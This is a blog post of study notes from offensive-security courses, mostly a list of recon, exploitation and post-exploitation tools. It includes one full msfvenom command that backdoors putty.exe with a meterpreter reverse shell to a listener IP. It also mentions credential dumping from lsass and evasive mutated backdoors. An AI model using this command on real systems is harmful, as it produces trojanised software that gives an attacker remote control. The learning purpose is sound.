Hi, it is been a while since i write here, sorry about that. Recently i have been doing some courses of offensive security and now i need to put things in order in my head because there is a lot of content. Work in progress.

Passive gathering of information:

1) google dorks! -> https://github.com/ivan-sincek/penetration-testing-cheat-sheet#google-dorks

2) Shodan.io

3) Censys.io

4) theHarvester

5) Maltego

6) recon-ng

7) archive.org

Semi-passive GAthering:

1) Foca. Only windows

2) dnsdumpster

3) centralOps

4) whireshark

5) tcpdump

Active gathering:
1) dnsRecon

2) nmap

3) amap

Vulnerability scan

1) CVE,CPE,CVSS

2) nmap

3) nessus

Exploitation and hacking of hosts


1) metasploit

2) msfvenom

3) pesidous

4) armitage

Exploitation and hacking of websites


1) Burp Suite

2) SQLInjection

3) code injection

4) sqlMap

5) path Traversal

6) webshells

7) file upload

8) html injection y XSS

9) CSRF

10) XSstrike

11) Cookie tampering, command injection

Exploitation and hacking of network vulnerabilities

1) MITM

2) Bettercap

3) ARP Spoofing

4) DNS Spoofing

5) Social engineering toolkit

6) Polymorph. Manipulation of network traffic in real time and programmable.

Post-exploitation techniques

1) meterpreter en metasploit

2) Mimicatz

3) UAC bypass

4) procdump y lsass.exe

5) backdoors en binarios con msfvenom.

msfvenom -a x86 --platform windows -x putty.exe -k -b windows/meterpreter/reverse_tcp lhost=192.168.242.130 lport=4000 -i 3 -b "\x00\x0a\x0d\x04\xa1\xb0\xb7\xEA" -f exe -o puttyBackdorizado.exe

6) Password cracking in hashed form with John the ripper and hashcat

7) session migration using the backdoor.

Machine learning applied to cybersecurity

1) Batea, reconnaissance of hosts based on their impact

2) pesidous, mutating backdoors using the one created by msfVenom. hard to install.

3) Deep fakes.

Mitre&Attck

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s